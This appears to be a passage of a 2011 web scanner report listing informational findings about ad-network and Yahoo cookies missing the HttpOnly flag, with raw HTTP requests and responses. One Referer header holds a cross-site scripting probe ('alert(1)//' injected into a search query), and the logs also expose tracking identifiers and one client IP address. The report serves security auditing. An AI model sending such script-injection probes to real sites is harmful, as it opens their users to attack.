GET /tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313297486_68372787_as3103_imp|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: act=a$305#1315313312306_68316035_as3106_clk!1315313297486_68372787_as3103_imp!|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Set-Cookie: imp=a$le#1315313312306_68316035_as3106_clk|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Location: http://ad.doubleclick.net/clk;233814261;57705890;k
Content-Length: 0
Date: Tue, 06 Sep 2011 12:48:32 GMT


10.36. http://ak1.abmr.net/is/www.burstnet.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.burstnet.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8117/3E06/&V=3-cwzEbZCyUni%2f8BpqAGOsC1A1e4rKZXfyTH1D5FeHizuf5PRgzsGOFg%3d%3d&I=F72DD362342178E&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: 01AI=2-2-CEA75E37E6AD97051B199F5C65B08B1FDBBAFC21037372201F06A86726AC8F7B-D1B963138697FBA3A5D965FE009043982D2E891BE605625CC233FC7124123F41

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8117/3E06/?01AD=3dkYMHVTzFhJCMGPi3NSiBcbGWNRR0UvEfUz4EkxlLyviMUraAANJXw&01RI=F72DD362342178E&01NA=
Expires: Tue, 06 Sep 2011 12:55:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close
Set-Cookie: 01AI=2-2-6E1EAF0179147B5D1D764362679C5E536EABA049D6323A5F5A0B520C95496E5D-C58C8B546BEE2EE1CDACBFEA5A790DA0813F5C3BFA7590E67B9304D8676098A0; expires=Wed, 05-Sep-2012 12:55:53 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.37. http://autos.yahoo.com/darla/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/fc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=autos&f=96432900&l=LREC&en=utf-8&npv=1&rn=1315331140773&em=%7B%22site-attribute%22%3A%22content%3D%27autosch%3D%22%22%20content%3D%22All%20Cars%3B%22%27%22%7D&t_e=1&.intl=us HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDY6MTIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTgmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDY6MTAiLCJhdXRvcy55YWhvby5jb21cL2Zhdmljb24uaWNvOTFhZjYlMDAlMGQlMGFmNTRlZDVjNDEwMCJdLFsiMjAxMTA5MDZfMDU6NDY6MTAiLCJhdXRvcy55YWhvby5jb21cL2Zhdmljb24uaWNvOWEyNDklMjUwZCUyNTBhMTE1NGMwZDI4YmIiXSxbIjIwMTEwOTA2XzA1OjQ2OjEwIiwiYXV0b3MueWFob28uY29tXC9mYXZpY29uLmljbzI2ZDEyJTBkJTBhYjBjMjhjNzVkOGMiXSxbIjIwMTEwOTA2XzA1OjQ2OjEwIiwiYXV0b3MueWFob28uY29tXC8yOTFmZiUwMCUwZCUwYWZjYzg4YThhOTU2Il1d&ver=1; expires=Wed, 07-Sep-2011 00:46:12 GMT; path=/; domain=autos.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 8095

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...

10.38. http://autos.yahoo.com/darla/md.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/md.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: AutosBH. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /darla/md.php?en=utf-8 HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDAiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTgmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdXQ--&ver=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDY6MTciLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_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_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTg0ODg2M2YyZWM2MDg2MWJlOTk4MTA1MWEmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDY6MTUiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49NDg4NjNmMmU5MTJlNGNiZjBhNzEwZDU3JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; expires=Wed, 07-Sep-2011 00:46:17 GMT; path=/; domain=autos.yahoo.com
Cache-Control: private
Expires: Mon, 16 Nov 2020 00:00:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 1712


<html>
<head>
    <meta http-equiv="Cache-Control" content="public" />
    <meta http-equiv="Expires" content="Mon, 16 Nov 2020 00:00:01 GMT" />
    <meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

10.39. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The value embeds a client IP address and a Unix timestamp and is re-issued with a two-year expiry, which marks it as a persistent tracking identifier.

Request

GET /b?c1=8&c2=6135404&c3=9&c4=9844&c10=3186830&ns__t=1315331133850&ns_c=ISO-8859-1&c8=Click%20here%20to%20find%20out%20more!&c7=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D8383746361359954%3F&c9=http%3A%2F%2Fgames.frontier.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 12:45:33 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 12:45:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.40. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: adxf and adxid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Set-Cookie: adxid=016e3b4e6615bdb5; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.41. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: adxf. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Tue Sep 6 12:45:35 UTC 2011 -->

10.42. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The JavaScript body in the response passes the same uid value to d.turn.com, so this is a cookie-sync beacon between advertising networks.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sun, 04-Mar-2012 12:50:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 06 Sep 2011 12:50:52 GMT

new Image().src="http://d.turn.com/r/dm/mkt/73/mpid//mpuid/2966958661410417168/nu/n";


10.43. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: DM50061742ACV6, WSS_GW and CTG. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM50061742AC05EN3&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrzr"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCC"%X%QBeBQCCr^riB^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCrizBz%X@rzr"%X%QBeQX%Xz%X%QBe%Xre"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@QezBz%X@rzr"%X%QBeQX%Xz%X%QBeBQ@C"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@zBz%XQCzXB"%X%QBeQX%Xz%X%QBer^Xe"%X%QBeQXCQ"%X%QBeQX%XiirCCX"XBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rzBz%X@^zr"%X%QBeQXCQz%X%QBe%%%X"%X%QBeQXCQ"%X%QBeQXCQ^%rQCC"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; CTG=1315265345

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM50061742ACV6=V1rQ(#X"rz%X%QXr^iCBeXr%XQz%zrz%"%X%QXr^iCBz%X%QXr^iCB"%X%QXr^iCX"%X%QXr^iCBeXr%XQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XQzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QXr^iCB; path=/; domain=.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: CTG=1315309843; path=/; domain=.hitbox.com; expires=Tue, 13-Sep-2011 11:50:43 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 06 Sep 2011 11:50:44 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.44. http://espanol.vonage.com/mpel.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /mpel.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: MP_GEOINFO. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The value is a JSON-style geolocation record scoped to Domain=.vonage.com, so script on any vonage.com host can read it.

Request

GET /mpel.js?href=http://www.vonage.com/&ref=http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service&lang=en-US HTTP/1.1
Host: espanol.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
